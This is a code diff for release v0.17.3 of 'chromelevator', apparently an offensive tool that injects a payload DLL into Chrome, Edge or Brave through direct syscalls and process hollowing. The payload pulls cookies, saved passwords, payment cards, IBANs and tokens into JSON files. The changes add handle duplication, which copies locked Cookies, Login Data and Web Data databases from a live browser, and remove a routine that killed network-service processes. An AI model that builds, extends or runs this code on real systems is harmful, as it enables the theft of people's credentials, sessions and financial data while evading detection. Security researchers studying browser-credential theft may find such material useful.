v0.17.3

Author: xaitax

CHANGELOG.md

@@ -2,6 +2,14 @@
 
 ## 🆕 Changelog
 
+### v0.17.3
+
+* **Locked SQLite Access via Handle Duplication**: Added syscall-based handle enumeration and duplication to access browser SQLite databases without terminating processes.
+  * Duplicates open database file handles into the payload process and extracts from a temporary copy.
+  * Prevents failures caused by active file locks on especially `Cookies`.
+* **Extended Syscall Coverage**: Added direct syscall support for handle and file operations (`NtDuplicateObject`, `NtQuerySystemInformation`, `NtQueryObject`, `NtReadFile`, `NtQueryInformationFile`, `NtSetInformationFile`).
+* **Extraction Flow Change**: Removed browser network-service termination logic in favor of non-intrusive live-process extraction.
+
 ### v0.17.2
 - **Browser Process Termination**: Added `-k/--kill` flag to terminate all running browser processes before extraction.
   - Uses direct syscalls (`NtTerminateProcess`, `NtGetNextProcess`, `NtOpenProcess`) for process termination.

README.md

@@ -149,7 +149,7 @@ _________ .__                         ___________.__                       __
  \______  /___|  /__|   \____/|__|_|  /_______  /|____/\___  >\_/  (____  /__|  \____/|__|
         \/     \/                   \/        \/           \/           \/
  Direct Syscall-Based Reflective Hollowing
- x64 & ARM64 | v0.17.2 by @xaitax
+ x64 & ARM64 | v0.17.3 by @xaitax
 
   Usage: chromelevator.exe [options] <chrome|edge|brave|all>
 
@@ -192,7 +192,7 @@ _________ .__                         ___________.__                       __
  \______  /___|  /__|   \____/|__|_|  /_______  /|____/\___  >\_/  (____  /__|  \____/|__|
         \/     \/                   \/        \/           \/           \/
  Direct Syscall-Based Reflective Hollowing
- x64 & ARM64 | v0.17.2 by @xaitax
+ x64 & ARM64 | v0.17.3 by @xaitax
 
   ┌──── Brave ──────────────────────────────────────
   │
@@ -256,11 +256,9 @@ _________ .__                         ___________.__                       __
  \______  /___|  /__|   \____/|__|_|  /_______  /|____/\___  >\_/  (____  /__|  \____/|__|
         \/     \/                   \/        \/           \/           \/
  Direct Syscall-Based Reflective Hollowing
- x64 & ARM64 | v0.17.2 by @xaitax
+ x64 & ARM64 | v0.17.3 by @xaitax
 
   ┌──── Chrome ──────────────────────────────────────
-  │ Terminating browser network services...
-  │   [+] Network services terminated
   │ Creating suspended process: C:\Program Files\Google\Chrome\Application\chrome.exe
   │   [+] Process created (PID: 13020)
   │   [+] IPC pipe established: \\.\pipe\chrome.sync.26370.18285.8B20

make.bat

@@ -89,11 +89,22 @@ cl %CFLAGS_COMMON% %CFLAGS_CPP% /c "%SRC_DIR%\payload\pipe_client.cpp" /Fo"%BUIL
 cl %CFLAGS_COMMON% %CFLAGS_CPP% /I"%LIBS_DIR%\sqlite" /c "%SRC_DIR%\payload\data_extractor.cpp" /Fo"%BUILD_DIR%\data_extractor.obj"
 cl %CFLAGS_COMMON% %CFLAGS_CPP% /c "%SRC_DIR%\crypto\aes_gcm.cpp" /Fo"%BUILD_DIR%\aes_gcm.obj"
 cl %CFLAGS_COMMON% %CFLAGS_CPP% /c "%SRC_DIR%\crypto\chacha20.cpp" /Fo"%BUILD_DIR%\chacha20.obj"
+cl %CFLAGS_COMMON% %CFLAGS_CPP% /c "%SRC_DIR%\payload\handle_duplicator.cpp" /Fo"%BUILD_DIR%\handle_duplicator.obj"
+cl %CFLAGS_COMMON% %CFLAGS_CPP% /c "%SRC_DIR%\sys\internal_api.cpp" /Fo"%BUILD_DIR%\internal_api_payload.obj"
+
+:: Compile syscall trampoline for payload DLL
+if "%VSCMD_ARG_TGT_ARCH%"=="arm64" (
+    armasm64.exe -nologo "%SRC_DIR%\sys\syscall_trampoline_arm64.asm" -o "%BUILD_DIR%\syscall_trampoline_payload.obj"
+) else (
+    ml64.exe /nologo /c /Fo"%BUILD_DIR%\syscall_trampoline_payload.obj" "%SRC_DIR%\sys\syscall_trampoline_x64.asm"
+)
 
 link %LFLAGS_COMMON% %LFLAGS_MERGE% /DLL /OUT:"%BUILD_DIR%\%PAYLOAD_DLL_NAME%" ^
     "%BUILD_DIR%\payload_main.obj" "%BUILD_DIR%\bootstrap.obj" "%BUILD_DIR%\elevator.obj" ^
     "%BUILD_DIR%\pipe_client.obj" "%BUILD_DIR%\data_extractor.obj" "%BUILD_DIR%\aes_gcm.obj" ^
-    "%BUILD_DIR%\chacha20.obj" "%BUILD_DIR%\sqlite3.lib" ^
+    "%BUILD_DIR%\chacha20.obj" "%BUILD_DIR%\handle_duplicator.obj" ^
+    "%BUILD_DIR%\internal_api_payload.obj" "%BUILD_DIR%\syscall_trampoline_payload.obj" ^
+    "%BUILD_DIR%\sqlite3.lib" ^
     bcrypt.lib ole32.lib oleaut32.lib shell32.lib version.lib comsuppw.lib crypt32.lib advapi32.lib kernel32.lib user32.lib libvcruntime.lib libucrt.lib
 goto :eof
 

src/core/version.hpp

@@ -6,9 +6,9 @@
 namespace Core {
 
     // Main version string - shown in banner
-    constexpr const char* VERSION = "0.17.2";
+    constexpr const char* VERSION = "0.17.3";
 
     // Full version for build identification (update for releases)
-    constexpr const char* BUILD_TAG = "v0.17.2";
+    constexpr const char* BUILD_TAG = "v0.17.3";
 
 }

src/injector/injector_main.cpp

@@ -45,10 +45,6 @@ void ProcessBrowser(const BrowserInfo& browser, bool verbose, bool fingerprint,
                 console.Debug("  [+] No running processes found");
             }
             Sleep(300);
-        } else {
-            console.Debug("Terminating browser network services...");
-            ProcessManager::KillNetworkServices(browser.exeName);
-            console.Debug("  [+] Network services terminated");
         }
 
         console.Debug("Creating suspended process: " + Core::ToUtf8(browser.fullPath));

src/injector/process_manager.cpp

@@ -81,48 +81,4 @@ namespace Injector {
         }
     }
 
-    void ProcessManager::KillNetworkServices(const std::wstring& processName) {
-        Core::UniqueHandle hCurrentProc;
-        HANDLE nextProcHandle = nullptr;
-
-        while (NtGetNextProcess_syscall(hCurrentProc.get(), PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_TERMINATE, 0, 0, &nextProcHandle) == 0) {
-            Core::UniqueHandle hNextProc(nextProcHandle);
-            hCurrentProc = std::move(hNextProc);
-
-            std::vector<BYTE> buffer(sizeof(UNICODE_STRING_SYSCALLS) + MAX_PATH * 2);
-            auto imageName = reinterpret_cast<PUNICODE_STRING_SYSCALLS>(buffer.data());
-            
-            if (NtQueryInformationProcess_syscall(hCurrentProc.get(), ProcessImageFileName, imageName, (ULONG)buffer.size(), NULL) != 0 || imageName->Length == 0)
-                continue;
-
-            std::wstring pPath(imageName->Buffer, imageName->Length / sizeof(wchar_t));
-            std::filesystem::path p(pPath);
-            
-            if (_wcsicmp(p.filename().c_str(), processName.c_str()) != 0)
-                continue;
-
-            PROCESS_BASIC_INFORMATION pbi{};
-            if (NtQueryInformationProcess_syscall(hCurrentProc.get(), ProcessBasicInformation, &pbi, sizeof(pbi), nullptr) != 0 || !pbi.PebBaseAddress)
-                continue;
-
-            // Read PEB to get command line
-            // Note: This is a simplified version. In a real elite tool, we'd be more robust reading remote memory.
-            // But for now, we follow the original logic.
-            PEB peb{};
-            if (NtReadVirtualMemory_syscall(hCurrentProc.get(), pbi.PebBaseAddress, &peb, sizeof(peb), nullptr) != 0) continue;
-            
-            RTL_USER_PROCESS_PARAMETERS params{};
-            if (NtReadVirtualMemory_syscall(hCurrentProc.get(), peb.ProcessParameters, &params, sizeof(params), nullptr) != 0) continue;
-
-            std::vector<wchar_t> cmdLine(params.CommandLine.Length / sizeof(wchar_t) + 1, 0);
-            if (params.CommandLine.Length > 0 && NtReadVirtualMemory_syscall(hCurrentProc.get(), params.CommandLine.Buffer, cmdLine.data(), params.CommandLine.Length, nullptr) == 0) {
-                if (wcsstr(cmdLine.data(), L"--utility-sub-type=network.mojom.NetworkService")) {
-                    NtTerminateProcess_syscall(hCurrentProc.get(), 0);
-                    // Wait for process to terminate and release file handles
-                    WaitForSingleObject(hCurrentProc.get(), 500);
-                }
-            }
-        }
-    }
-
 }

src/injector/process_manager.hpp

@@ -19,9 +19,6 @@ namespace Injector {
         HANDLE GetThreadHandle() const { return m_hThread.get(); }
         DWORD GetPid() const { return m_pid; }
 
-        // Kill existing network services to free file locks
-        static void KillNetworkServices(const std::wstring& processName);
-
     private:
         void CheckArchitecture();
 

src/payload/data_extractor.cpp

@@ -2,6 +2,7 @@
 // Licensed under the MIT License. See LICENSE file in the project root for full license information.
 
 #include "data_extractor.hpp"
+#include "handle_duplicator.hpp"
 #include "../crypto/aes_gcm.hpp"
 #include <fstream>
 #include <sstream>
@@ -23,6 +24,55 @@ namespace Payload {
         return db;
     }
 
+    sqlite3* DataExtractor::OpenDatabaseWithHandleDuplication(const std::filesystem::path& dbPath) {
+        sqlite3* db = OpenDatabase(dbPath);
+        if (db) {
+            sqlite3_stmt* stmt = nullptr;
+            if (sqlite3_prepare_v2(db, "SELECT 1", -1, &stmt, nullptr) == SQLITE_OK) {
+                if (sqlite3_step(stmt) == SQLITE_ROW) {
+                    sqlite3_finalize(stmt);
+                    return db;
+                }
+                sqlite3_finalize(stmt);
+            }
+            sqlite3_close(db);
+            db = nullptr;
+        }
+
+        HandleDuplicator duplicator;
+
+        auto tempDir = m_outputBase / ".temp";
+        auto tempDbPath = duplicator.CopyLockedFile(dbPath, tempDir);
+
+        if (!tempDbPath) {
+            return nullptr;
+        }
+
+        m_tempFiles.push_back(*tempDbPath);
+
+        return OpenDatabase(*tempDbPath);
+    }
+
+    void DataExtractor::CleanupTempFiles() {
+        for (const auto& tempFile : m_tempFiles) {
+            try {
+                if (std::filesystem::exists(tempFile)) {
+                    std::filesystem::remove(tempFile);
+                }
+            } catch (...) {
+                // Ignore cleanup failures
+            }
+        }
+        m_tempFiles.clear();
+
+        try {
+            auto tempDir = m_outputBase / ".temp";
+            if (std::filesystem::exists(tempDir) && std::filesystem::is_empty(tempDir)) {
+                std::filesystem::remove(tempDir);
+            }
+        } catch (...) {}
+    }
+
     void DataExtractor::ProcessProfile(const std::filesystem::path& profilePath, const std::string& browserName) {
         m_pipe.Log("PROFILE:" + profilePath.filename().string());
 
@@ -38,7 +88,7 @@ namespace Payload {
             // Cookies
             auto cookiePath = profilePath / "Network" / "Cookies";
             if (std::filesystem::exists(cookiePath)) {
-                if (auto db = OpenDatabase(cookiePath)) {
+                if (auto db = OpenDatabaseWithHandleDuplication(cookiePath)) {
                     ExtractCookies(db, m_outputBase / browserName / profilePath.filename() / "cookies.json");
                     sqlite3_close(db);
                 }
@@ -49,7 +99,7 @@ namespace Payload {
             // Passwords
             auto loginPath = profilePath / "Login Data";
             if (std::filesystem::exists(loginPath)) {
-                if (auto db = OpenDatabase(loginPath)) {
+                if (auto db = OpenDatabaseWithHandleDuplication(loginPath)) {
                     ExtractPasswords(db, m_outputBase / browserName / profilePath.filename() / "passwords.json");
                     sqlite3_close(db);
                 }
@@ -60,14 +110,16 @@ namespace Payload {
             // Cards & IBANs (Web Data)
             auto webDataPath = profilePath / "Web Data";
             if (std::filesystem::exists(webDataPath)) {
-                if (auto db = OpenDatabase(webDataPath)) {
+                if (auto db = OpenDatabaseWithHandleDuplication(webDataPath)) {
                     ExtractCards(db, m_outputBase / browserName / profilePath.filename() / "cards.json");
                     ExtractIBANs(db, m_outputBase / browserName / profilePath.filename() / "iban.json");
                     ExtractTokens(db, m_outputBase / browserName / profilePath.filename() / "tokens.json");
                     sqlite3_close(db);
                 }
             }
         } catch(...) {}
+
+        CleanupTempFiles();
     }
 
     void DataExtractor::ExtractCookies(sqlite3* db, const std::filesystem::path& outFile) {

src/payload/data_extractor.hpp

@@ -20,6 +20,10 @@ namespace Payload {
     private:
         sqlite3* OpenDatabase(const std::filesystem::path& dbPath);
 
+        sqlite3* OpenDatabaseWithHandleDuplication(const std::filesystem::path& dbPath);
+        
+        void CleanupTempFiles();
+        
         void ExtractCookies(sqlite3* db, const std::filesystem::path& outFile);
         void ExtractPasswords(sqlite3* db, const std::filesystem::path& outFile);
         void ExtractCards(sqlite3* db, const std::filesystem::path& outFile);
@@ -31,6 +35,8 @@ namespace Payload {
         PipeClient& m_pipe;
         std::vector<uint8_t> m_key;
         std::filesystem::path m_outputBase;
+        
+        std::vector<std::filesystem::path> m_tempFiles;
     };
 
 }